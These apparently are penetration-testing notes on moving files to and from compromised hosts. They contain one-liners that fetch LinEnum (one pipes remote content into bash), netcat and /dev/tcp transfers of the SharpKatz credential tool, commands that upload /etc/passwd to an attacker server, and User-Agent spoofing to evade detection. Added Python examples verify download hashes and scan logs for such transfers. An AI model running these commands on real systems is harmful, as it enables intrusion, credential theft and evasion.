Downloads#

Python#

python2.7 -c 'import urllib;urllib.urlretrieve ("https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh", "LinEnum.sh")'
python3 -c 'import urllib.request;urllib.request.urlretrieve("https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh", "LinEnum.sh")'

PHP#

# using file_get_contents() and file_put_contents()
php -r '$file = file_get_contents("https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh"); file_put_contents("LinEnum.sh",$file);'

# using fopen()
php -r 'const BUFFER = 1024; $fremote = fopen("https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh", "rb"); $flocal = fopen("LinEnum.sh", "wb"); while ($buffer = fread($fremote, BUFFER)) { fwrite($flocal, $buffer); } fclose($flocal); fclose($fremote);'

# using pipe to bash (needs the URL `fopen` wrappers, i.e. `allow_url_fopen`, enabled in PHP)
php -r '$lines = @file("https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh"); foreach ($lines as $line_num => $line) { echo $line; }' | bash
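The one-liners above, including the last one that pipes remote content straight into bash, store or execute whatever the server returns. The Python function below is an added example, not code from these notes or from the LinEnum project: it pins a SHA-256 in advance and refuses to hand over content that does not match. The `fetch` parameter, the `SAMPLE` script bytes and their hash are assumptions introduced so the check can be exercised offline.

```python
import hashlib
import hmac
import urllib.request
from typing import Callable

# Constructed stand-in for a downloaded script (assumption of this example).
SAMPLE = b"#!/bin/bash\necho 'enumeration would go here'\n"
SAMPLE_SHA256 = hashlib.sha256(SAMPLE).hexdigest()


def http_fetch(url: str) -> bytes:
    """Default fetcher: the same urllib download as the python3 one-liner, returned as bytes."""
    with urllib.request.urlopen(url) as resp:
        return resp.read()


def fetch_verified(url: str, expected_sha256: str,
                   fetch: Callable[[str], bytes] = http_fetch) -> bytes:
    """Return the content at url only if its SHA-256 equals the pinned hash.

    Raises ValueError on mismatch, so a swapped or tampered script never
    reaches the caller (and never reaches `| bash`). `fetch` is injectable
    so the check can be tested without network access.
    """
    data = fetch(url)
    actual = hashlib.sha256(data).hexdigest()
    # compare_digest is not required for a public hash, but it is the habit
    # worth keeping for any equality check on digests or secrets.
    if not hmac.compare_digest(actual, expected_sha256.lower()):
        raise ValueError(f"SHA-256 mismatch: expected {expected_sha256}, got {actual}")
    return data


def download_verified(url: str, expected_sha256: str, dest: str,
                      fetch: Callable[[str], bytes] = http_fetch) -> int:
    """Write the verified content to dest; returns the number of bytes written."""
    data = fetch_verified(url, expected_sha256, fetch)
    with open(dest, "wb") as fh:
        return fh.write(data)


if __name__ == "__main__":
    # Offline demonstration with the constructed sample instead of a live URL.
    good = fetch_verified("https://example.invalid/LinEnum.sh", SAMPLE_SHA256,
                          fetch=lambda _u: SAMPLE)
    print("verified", len(good), "bytes")
    try:
        fetch_verified("https://example.invalid/LinEnum.sh", SAMPLE_SHA256,
                       fetch=lambda _u: SAMPLE + b"id\n")
    except ValueError as err:
        print("rejected:", err)
```

With a real URL, `download_verified(url, pinned_hash, "LinEnum.sh")` replaces the `urlretrieve` one-liner; the pinned hash comes from the project release or a copy already on the attack box, never from the same server that serves the file.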

Ruby#

ruby -e 'require "net/http"; File.write("LinEnum.sh", Net::HTTP.get(URI.parse("https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh")))'

Perl#

perl -e 'use LWP::Simple; getstore("https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh", "LinEnum.sh");'

Netcat/Ncat#

Start a Netcat listener on the victim machine:

# victim
nc -l -p 8000 > SharpKatz.exe
ncat -l -p 8000 --recv-only > SharpKatz.exe

The --recv-only flag is needed for Ncat to close the connection once the file transfer is done.

Connect to the victim and upload SharpKatz.exe:

nc -q 0 <IP> 8000 < SharpKatz.exe
ncat --send-only <IP> 8000 < SharpKatz.exe

The -q 0 tells Netcat to close the connection once it finishes transferring the file.

For Ncat we can use --send-only: when used in both connect and listen modes, it prompts Ncat to terminate once its input is exhausted.

Sending a file as Input#

# attacker
sudo nc -l -p 443 -q 0 < SharpKatz.exe
sudo ncat -l -p 443 --send-only < SharpKatz.exe

# victim
nc <IP> 443 > SharpKatz.exe
ncat <IP> 443 --recv-only > SharpKatz.exe

Receiving a file from /dev/tcp#

If we don’t have Netcat/Ncat on the compromised machine, we can use bash and the /dev/tcp pseudo-device.

cat < /dev/tcp/<IP>/443 > SharpKatz.exe

Uploads#

💡 Assuming we have uploadserver running on our attack box

Python#

Using the requests module:

python3 -c 'import requests;requests.post("http://<IP>:8000/upload",files={"files":open("/etc/passwd","rb")})'

nginx with HTTPS#

There is nothing worse than being on a penetration test, and a client’s network IDS picks up on a sensitive file being transferred over plaintext and having them ask why we sent a password to our cloud server without using encryption.

# /etc/nginx/sites-available/upload.conf
server {
    listen 9001;

    location /SecureLocationButRenameIt/ {
        root        /var/www/uploads;
        dav_methods PUT;
    }
}
sudo mkdir -p /var/www/uploads/SecureLocationButRenameIt
sudo chown -R www-data:www-data /var/www/uploads/SecureLocationButRenameIt
sudo ln -s /etc/nginx/sites-available/upload.conf /etc/nginx/sites-enabled/
sudo systemctl restart nginx.service

# if we get any errors
tail -f /var/log/nginx/error.log

We can also use ss or ps to check if TCP/80 is occupied. If that’s the case we can remove nginx’s default configuration, which binds on port 80:

sudo rm /etc/nginx/sites-enabled/default

Then we can upload files using curl (the path must match the location block configured above):

curl -T /etc/passwd http://localhost:9001/SecureLocationButRenameIt/users.txt

💡 Why not apache2?

By default, with Apache, if we hit a directory without index.{php|html}, it will show a directory listing, which is not the case in nginx.

RDP#

RDP is commonly used in Windows for remote access. In Windows, we can copy-paste using the RDP session.

In Linux, we can try to manually copy and paste using either xfreerdp or rdesktop, but this may not work under some circumstances. If that’s the case, we may start an RDP session with a local directory mounted on the target machine:

rdesktop <IP> -d DOMAIN -u administrator -p 'Password' -r disk:linux="/home/$(whoami)/mounted"

xfreerdp /v:<IP> /d:DOMAIN /u:administrator /p:'Password' /drive:linux,/home/$(whoami)/mounted

We can access the directory by connecting to \\tsclient (in My Computer -> Network), which allows file transfers in both directions.

We can also try the native mstsc.exe RDP client.

Encrypting File Transfers#

See file-encryption. Remember to use an SSL/TLS-enabled transport method (HTTPS, SFTP, etc.).

Detection#

  • User-Agent whitelist fed into a SIEM tool

Obfuscation#

  • Changing the User-Agent

For PowerShell:

# List User-Agents
[Microsoft.PowerShell.Commands.PSUserAgent].GetProperties() | Select-Object Name,@{label="User Agent";Expression={[Microsoft.PowerShell.Commands.PSUserAgent]::$($_.Name)}} | fl

# changing the User-Agent
$UserAgent = [Microsoft.PowerShell.Commands.PSUserAgent]::Chrome
Invoke-WebRequest http://10.10.10.32/nc.exe -UserAgent $UserAgent -OutFile "C:\Users\Public\nc.exe"
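As an added example that is not part of the original notes, the Python script below turns the Detection bullet (a User-Agent whitelist fed into a SIEM) into concrete logic run over constructed nginx combined-format access-log lines. Because the Obfuscation section shows how easily the agent string is swapped for a browser's, the script also flags PUT/POST uploads and downloads of tool-like files regardless of User-Agent. The allowlist prefix, the source IP, the timestamps and every log line are constructed assumptions, not data from the page.

```python
import re
from typing import Iterable, List, Tuple

# nginx/apache "combined" log format:
# src - user [ts] "METHOD /path HTTP/x" status size "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)(?: [^"]*)?" '
    r'(?P<status>\d{3}) (?P<size>\d+|-) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Assumed allowlist: prefixes of the browser agents actually deployed in the environment.
UA_ALLOWLIST = (
    "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/",
)

# Checks that do not depend on the (spoofable) User-Agent.
UPLOAD_METHODS = {"PUT", "POST"}
TOOL_EXTENSIONS = (".exe", ".sh", ".ps1", ".dll")


def ua_allowed(ua: str) -> bool:
    return any(ua.startswith(prefix) for prefix in UA_ALLOWLIST)


def findings_for(line: str) -> List[str]:
    """Return the list of reasons this log line deserves analyst attention (empty if none)."""
    m = LOG_RE.match(line)
    if not m:
        return ["unparsable log line"]
    reasons = []
    if not ua_allowed(m["ua"]):
        reasons.append(f"non-allowlisted User-Agent: {m['ua']}")
    if m["method"] in UPLOAD_METHODS:
        reasons.append(f"{m['method']} to {m['path']} (possible upload)")
    if m["path"].lower().endswith(TOOL_EXTENSIONS):
        reasons.append(f"tool-like download: {m['path']}")
    return reasons


def scan(lines: Iterable[str]) -> List[Tuple[int, str]]:
    """Run findings_for over every line; returns (line number, reason) pairs."""
    results = []
    for n, line in enumerate(lines, 1):
        for reason in findings_for(line.rstrip("\n")):
            results.append((n, reason))
    return results


# Constructed sample log (assumption of this example, not captured traffic).
CHROME = ("Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 "
          "(KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36")
SAMPLE_LOG = [
    f'10.10.14.5 - - [10/Jan/2024:10:00:01 +0000] "GET /index.html HTTP/1.1" 200 1024 "-" "{CHROME}"',
    '10.10.14.5 - - [10/Jan/2024:10:00:05 +0000] "POST /upload HTTP/1.1" 204 0 "-" "python-requests/2.31.0"',
    '10.10.14.5 - - [10/Jan/2024:10:00:09 +0000] "PUT /SecureLocationButRenameIt/users.txt HTTP/1.1" 201 0 "-" "curl/8.4.0"',
    '10.10.14.5 - - [10/Jan/2024:10:00:12 +0000] "GET /nc.exe HTTP/1.1" 200 38616 "-" '
    '"Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1"',
    # Same download with the agent switched to Chrome: only the file-type check still fires.
    f'10.10.14.5 - - [10/Jan/2024:10:00:20 +0000] "GET /nc.exe HTTP/1.1" 200 38616 "-" "{CHROME}"',
]

if __name__ == "__main__":
    for n, reason in scan(SAMPLE_LOG):
        print(f"line {n}: {reason}")
```

The last sample line is the point of pairing the two checks: once the agent string is set to `PSUserAgent::Chrome`, the allowlist alone is silent, and only the method- and path-based rules still produce a finding.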